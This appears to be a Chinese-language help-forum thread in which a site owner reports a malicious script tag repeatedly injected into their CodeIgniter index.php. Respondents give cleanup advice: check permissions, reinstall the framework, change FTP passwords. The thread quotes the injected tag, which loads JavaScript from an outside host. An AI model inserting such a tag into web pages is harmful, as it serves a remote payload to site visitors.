我的網站有問題。我不這樣做爲什麼index.php被插入下面的腳本。這個index.php是codeigniter的一部分,這是我當前使用的框架。這是插入通過訪問FTP或通過代碼。在我刪除這個腳本後,我發現在瀏覽器的左下角有另一個正在讀取的URL。我不知道如何跟蹤這個,因爲我試圖找到這個網址,但我看不到它。請幫我我網站上的另一個網址鏈接
我遇到這種情況兩次。
任何建議將不勝感激。
<script type="text/javascript" src="http://drunkjeans.com:8080/Cc.js"></script>
<!--11428cb2b3b67368730c012cb53eb247-->
您的網站可能已被攻擊者入侵。如果您有任何世界可寫的文件夾(請檢查您的文件夾權限),可能會發生此類事情。還要檢查之前沒有的新文件(它們可以被命名爲任何文件,並且可以位於網站根文件夾中的任何文件夾中)。
有關類似的攻擊一些更多的信息,請參閱:
http://forums.techguy.org/virus-other-malware-removal/871970-strange-b1-html-tag-embedding.html
和
http://www.phpfreaks.com/forums/index.php/topic,274404.msg1297647.html#msg1297647
嗨,感謝您的回覆 我的意思是在我的php,html和js腳本已經插入的結尾,我試圖替換所有的文件,但一小時後它又被攻擊了。我的文件夾在ftp中的文件屬性,只有擁有者的權限已經被檢查。我試圖看看你提供的論壇鏈接,但我找不到任何明確的解決方案。非常感謝 – tirso 2010-07-09 08:05:56
更改受影響的文件不會解決任何問題。您需要根除上傳到網站文件夾中的腳本(可能有一個或多個腳本)。 老實說,處理它的最好方法可能是先安裝Code Ignitor,然後手動引入對代碼庫所做的任何更改/添加。否則,您可能會錯過其中一個惡意腳本並回到原點。 – ashicus 2010-07-13 01:30:13
嗨我得到了一些信息在這裏:http://www.everythingilike.com/roundstorm-ftp-hack-solution
基本上JS砍插入一個執行的Java應用程序。這個Java應用程序掃描您的FTP信息,甚至任何Shell/SSH登錄信息。我建議在清理完後更改所有密碼。
你是什麼意思index.pp被插入?像src =「http://index.php/drunkjeans.com:8080/Cc.js? – ggfan 2010-07-09 03:26:47
你的問題並不清楚,你正在使用CI.IIRC,CI使用的index.php文件與其他框架非常相似。知道CI的工作原理嗎?你正在開發還是你繼承了這個項目? 你想知道如何插入腳本標記嗎? – 2010-07-09 03:36:52
如果你還沒有改變CI的選項,默認情況下應該是index.php顯示 – ggfan 2010-07-09 03:38:46